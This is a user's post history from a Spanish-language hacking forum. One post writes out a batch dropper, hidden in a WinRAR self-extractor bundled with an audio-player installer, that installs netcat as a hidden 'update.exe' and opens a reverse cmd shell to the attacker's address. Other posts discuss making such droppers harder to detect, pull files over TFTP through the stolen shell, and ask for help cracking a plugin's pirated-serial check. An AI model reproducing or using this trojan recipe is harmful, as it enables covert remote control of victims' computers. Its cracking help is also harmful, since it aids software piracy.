|
Mostrar Mensajes
|
Páginas: [1]
|
2
|
Seguridad Informática / Hacking / Re: SFX Winrar: velocidad de ejecucion
|
en: 21 Febrero 2011, 05:18 am
|
Hola!ya me di cuenta que pasaba . Tambien es buena solucion la que me diste en cualquier caso, no lo habia pensado.
1) El problema estaba en la proceso de extraccion del auto-extraible EN la VirtualBox, porque intente extraerlo en mi maquina y lo hace en un segundo.
Entonces probe extraer algunos .rar en la VirtualBox pero me anduvo perfecto. Es probable que sea el instalador del AIMP porque recien probe con otro instalador hacer un auto-extraible y anduvo rapido.
2) Otra cuestion es que en el auto-extraible, apretando boton derecho->Propiedades, en la solapa Comentarios avisa que se va a ejecutar un archivo ejecutable luego de la extraccion. Lo unico que lo disfraza un poco es el icono . Estuve leyendo de los binders y joiners pero son muy detectables . Por ahi me faltaria probar con el IExpress o el SFX Compiler , aunque me da la sensacion de que queda igual que hacerlo con el WinRar.
|
|
|
3
|
Seguridad Informática / Hacking / SFX Winrar: velocidad de ejecucion
|
en: 20 Febrero 2011, 19:00 pm
|
Soy bastante principiante si..
Antes de empezar quiero aclarar que todo me funciono, el problema es que al hacer doble click en el autoextraible, tarda como 5 segundos en hacer todo ,y queda sospechoso.
Hice un autoextraible SFX con el Winrar, en donde meti 3 programas:
- AIMP_2.10.exe - netcat.exe - instrucciones.exe
El AIMP es el reproductor de audio. El archivo instrucciones.exe lo escribi en .bat y lo compile con el QuickBFC para que se ejecute en modo oculto (o ghost). Y dice:
--------- @echo off copy netcat.exe %SystemRoot%\system32\update.exe del netcat.exe cd %SystemRoot%\system32 attrib +H +S update.exe start /B %SystemRoot%\system32\update -d -e cmd.exe 192.168.1.101 8888 cd %HomeDrive%\tmp start AIMP_2.10.exe ---------
Para eso yo desde mi maquina atacante ya estoy escuchando en el puerto 8888 . Y el auto-extraible lo abro desde una maquina victima en el VirtualBox.
Es decir que el auto-extraible lo que hace es descomprimir los archivos en una carpeta temporal (c:\tmp) y ejecutar el archivo "instrucciones.exe". Pero tarda como 5 segundos obtener la shell y recien abrir el AIMP_2.10.exe
Pero si yo en vez de abrir el auto-extraible , extraigo los archivos a una carpeta y ejecuto el "instrucciones.exe" , pasa todo en un instante.
Por lo que deduzco que el problema esta en el auto-extraible .. Queria consultarles si estoy errado, y si puedo hacer algo para agilizar el proceso
|
|
|
4
|
Seguridad Informática / Hacking / TFTP: problema detallado
|
en: 20 Febrero 2011, 17:35 pm
|
El tema es asi.
Tengo mi maquina (atacante, ip 192.168.1.101), y un VirtualBox (victima, ip 10.0.2.10), las dos con windows xp sp2. Hice shell inversa con el NETCAT , y obtuve la shell de la maquina victima .
Ahora yo quiero tranferir archivos por TFTP . Instale el server TFTPd32 en mi maquina (atacante) y lo tengo andando. Ya configure la carpeta base, y en Security le di None.
En la carpeta base tengo un archivo "hola.txt" . Introduzco la siguiente sentencia en la maquina victima por la shell que obtuve:
C:\> tftp -i 192.168.1.101 get hola.txt
y me termina diciendo Tiempo de espera agotado.
El log del tftpd32 me dice:
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:09.046] Read request for file <hola.txt>. Mode octet [20/02 13:34:09.046] Using local port 1992 [20/02 13:34:09.046] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:09.093] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:10.078] Read request for file <hola.txt>. Mode octet [20/02 13:34:10.078] Using local port 1993 [20/02 13:34:10.078] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:10.140] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:12.140] Read request for file <hola.txt>. Mode octet [20/02 13:34:12.140] Using local port 1994 [20/02 13:34:12.140] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:12.187] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:16.234] Read request for file <hola.txt>. Mode octet [20/02 13:34:16.234] Using local port 1995 [20/02 13:34:16.234] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:16.296] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:24.296] Read request for file <hola.txt>. Mode octet [20/02 13:34:24.296] Using local port 1996 [20/02 13:34:24.296] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:24.343] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:32.343] Read request for file <hola.txt>. Mode octet [20/02 13:34:32.343] Using local port 2001 [20/02 13:34:32.343] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:32.406] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:40.390] Read request for file <hola.txt>. Mode octet [20/02 13:34:40.406] Using local port 2002 [20/02 13:34:40.406] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:40.453] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:48.453] Read request for file <hola.txt>. Mode octet [20/02 13:34:48.453] Using local port 2003 [20/02 13:34:48.453] Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:48.500] Connection received from 192.168.1.101 on port 1991 [20/02 13:34:56.500] Unexpected request 5 from peer [20/02 13:34:56.500] Returning EBADOP to Peer [20/02 13:34:56.500]
Alguien sabe que puede estar sucediendo? Aclaro que tengo los firewall desactivados en las dos maquinas.
|
|
|
6
|
Programación / Ingeniería Inversa / Re: consulta sobre un Serial. adjunto foto.
|
en: 15 Octubre 2010, 23:53 pm
|
LSL. Sos un genio.
Lo que yo pense fue que esa era la lista de serials validos y que habia otra linea que me estaban llevando a las ventanas de alerta. Ahora, no se como se "creo esa lista negra" porque cuando yo lo instale me anduvo como 1 mes el programa con una de esos serials. Te juro que hace 2 horas que estoy leyendo el tutorial de Narvaja porque no me venia mal saber un poco de esto y es lento pero se entiende casi todo .
Les hago una pregunta mas. Me imagino que se puede hacer mil cosas con el Olly..es como desarmar el programa..buscar y ver de donde vino tal cosa. Que otras cosas aparte del cracking se pueden hacer con el Olly?
UN ABRAZO ,GRACIAS!!!
|
|
|
8
|
Programación / Ingeniería Inversa / consulta sobre un Serial. adjunto foto.
|
en: 15 Octubre 2010, 16:59 pm
|
Buenas. Baje un programa, un secuenciador de baterias, es un plugin, archivo .dll Se llama Guru. lo instale y busque el serial y anduvo perfecto pero ahora me salta el siguiente aviso "This GURU is using an illegal pirated serial number and has been deactivated, and your IP has been logged". CREO, que fue a partir de que me registre en la pagina oficial para bajar el manual, un boludo si. El tema es que estoy investigando pero no cazo una con el desensamblador. Si alguien tiene idea como seguir le agredeciera eternamente. Aca adjunto una foto de hasta donde llegue con el Ollydbg, y por las dudas el .dll en cuestion. Guru.dll -> http://www.mediafire.com/?tw7jilh4oc55i06un Abrazo
|
|
|
|
|
|
|